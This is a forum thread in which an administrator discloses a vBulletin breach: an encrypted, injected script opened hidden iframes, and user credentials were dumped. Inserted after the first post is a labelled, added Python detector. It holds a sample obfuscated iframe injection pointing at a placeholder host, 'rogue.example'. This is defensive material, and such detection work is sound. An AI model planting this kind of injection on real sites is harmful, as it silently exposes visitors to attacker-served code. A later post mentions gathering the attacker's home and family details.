#1 | Administrator | Join Date: Jun 2009 | Location: USA | Posts: 6,764

Hello everybody! I'm a big fan of total disclosure, and because of this, I'm disclosing an incident that happened a couple days ago which affects all users. Due to a major flaw in one of the forum components that these vBulletin forums use, this website was hit with an automated hacking bot that is just now starting to "penetrate" the internet in a very wide and massive way. The automated hack bot, using 2 major flaws in this forum software, was partially successful in its goal.

Basically this is what happened: About 5 days ago I noticed some very odd activity on the forums. There was some weird javascript code being inserted into the forum header. I found the JS code and after a few seconds I learned it was encrypted. Googling found no initial results, so I went to work on the JS. I learned it opened up an IFRAME to a specific URL, which, at the time, didn't appear to do anything. I enlisted the help of Muffinman, who knows quite a bit more about JS than me, and he confirmed that the encrypted JS indeed opened up an IFrame call to a PHP file on some rogue server. I removed all that bad stuff, only to find it re-appear the next day. Also, a quick google search showed that a lot of sites were now reporting being attacked, just like ours was.

At that point, I did some deep peering into the forum server and found some really bad stuff. With Muffin's help, we located arbitrary code which gave the automated hack bot the full username/password list of every account on our website. After about 8 hours I figured out the exact method and process, and was able to duplicate the exact hack that was used. I then went to the software companies that make the commercial software we use, and spoke directly with the owner, duplicated the issue, and was given a patch. After doing further digging, this hack is moving through the forum world like wildfire right now and we were indeed very lucky to catch it right away.

I've since applied the fix to this bug, cleaned everything up, and have now implemented a requirement that everybody change their forum password ASAP. If you have not already been prompted to, please change your forum password ASAP.

So in the interest of full disclosure:
- The hack used was a vBulletin SEO hack (patched).
- The hack was identified as an automated bot due to its repeated failed attempts at injecting encrypted Javascript into our custom forum design.
- The hack used varied IP addresses in these blocks: 87.118. 195.66. 93.183.
- The hack was able to download only a specific mysql query, which was to list 2 items: username, password of all users.

Common Questions:

Is your PC Safe? This hack only affected the forums, and only grabbed your username/password to the forum itself, and did not affect anything that you would download and infect your PC with.

Does this affect Pwnboxer? Nope, Pwnboxer is on its own server, completely unrelated to this, done so for this very security reason.

Does this affect my WoW account? Nope, not in any fashion.

So how exactly does this affect me? Your user/pass could be used to log into the forum account, post as you, spam users, etc.

Could the hack bot do anything else? No. The bug in the forum software was fixed, and I manually banned 196,000 IP addresses that the hack bot could potentially come from.

While this may not seem like a big deal, since it only affects your forum account, I still believe that you deserve to know what happened. Let me know if you have any questions!!!
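A defender-side check for the kind of injection described in the post above, added here as an example that is not code from the original thread or from vBulletin: it scans a header template for inline scripts, peels the `unescape()` and `String.fromCharCode()` obfuscation layers such loaders typically use, and reports any iframe whose source points at a host other than the site's own. The sample template, the `rogue.example` host and the `forum.example` allow-list are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample: a forum header template with a percent-encoded script injected
# before the closing </div>. Decoded, it writes a hidden <iframe> that loads a PHP
# file from an outside host (placeholder domain, not a real indicator).
SAMPLE_HEADER = """<div id="header">
<a href="/forum/index.php"><img src="/images/logo.gif" alt="Forums"></a>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Frogue.example%2Fin.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'))</script>
</div>
"""

ALLOWED_HOSTS = {"forum.example"}  # assumption: the forum's own host(s)

SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=[\"']?([^\s\"'>]+)", re.I)


def decode_layers(js, max_rounds=5):
    """Peel nested unescape('%..') and String.fromCharCode(..) layers until stable."""
    for _ in range(max_rounds):
        new = UNESCAPE.sub(lambda m: unquote(m.group(1)), js)
        new = FROMCHARCODE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            new)
        if new == js:
            break
        js = new
    return js


def find_offsite_iframes(html, allowed_hosts=ALLOWED_HOSTS):
    """Return sorted (host, src) pairs for iframes served from outside allowed_hosts,
    including ones hidden inside obfuscated inline scripts."""
    hits = set()
    candidates = [html] + [decode_layers(m.group(1)) for m in SCRIPT.finditer(html)]
    for text in candidates:
        for src in IFRAME_SRC.findall(text):
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                hits.add((host, src))
    return sorted(hits)


if __name__ == "__main__":
    for host, src in find_offsite_iframes(SAMPLE_HEADER):
        print(f"off-site iframe -> {host}: {src}")
```

Run it over each template that renders on every page (header, footer, navbar) after restoring from a known-good copy; a non-empty result on a freshly cleaned template is the re-infection signal the post describes.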
#2 | Senior Member

I worked almost all day that day on this with Tim. I can confirm everything he has said here. In my almost 10 years of professional computer experience, I have never seen such a bugger of a hack as this one; it was absolutely the hardest thing I have ever helped track down. As Tim said, the only thing it grabbed was the username/password combos from THIS FORUM. It did not touch anything on your PC at all. While the passwords on these forums are encrypted, Tim is having everyone change their passwords just to be safe. I will help Tim answer any questions you guys have! LATERZ!
#3 | Senior Member | Join Date: Nov 2009 | Location: Vancouver, Canada | Posts: 2,419

A good reason to not use the same username/password combo on more than one site, particularly if you care about whatever is being protected. I'd guess this would be some gold selling company that wanted access to our actual WoW accounts. Not really sure on that, but that would be my guess.
#4 | Administrator | Join Date: Jun 2009 | Location: USA | Posts: 6,764

Quote:

It was simply an automated attack, which happens all the time. In the realm of speaking, most servers on the internet have attacks launched against them at a rate of 5000+ per day, every day, 24/7. It is just the way things are. So to repeat, this was NOT a gold farmer or anything targeted toward WoW, simply just an automated bot attack.
#5 | Senior Member

Quote:

When googling the bits of Javascript that affected this site, I found everything from PS3 forums to forums on how to make a delicious roast that had all been infected.
#6 | Senior Member

I know it! I came on and saw the MySQL bugged code. Want me to make their life hell???
#7 | Senior Member

(Tim snipped a bit here; your comments, ebony, are good comments, but they might be construed in a scary way, but I do agree with what you said. Interesting underground world going on.) So here's the end of the story: DO NOT USE THE SAME EMAIL/PASSWORD AS ANY OTHER SITE ON THE INTERNET IF YOU HAVE NOT GOT A KEYFOB or app! I have an email that is for banks/WoW/PayPal/eBay (anything that costs me RL money) and do not use it anywhere.

Last edited by Tim; 02-24-2010 at 01:32 AM. Reason: Tim edit - scary!
#8 | Administrator | Join Date: Jun 2009 | Location: USA | Posts: 6,764

Folks, I have a fun update. I've been working on tracking down the specific individual responsible for this, and in a breaking case, I now have in my property the name, home address, phone number, parents' information, etc., of the specific individual who launched the attack against our website. I am assembling the information together in a presentable and conclusive case and will be visiting the FBI local office in Minnesota and opening up a case. Any interest by you guys in staying afloat of the whole situation?
#9 | Junior Member | Join Date: Feb 2010 | Location: Winterville, NC | Posts: 18

Sure.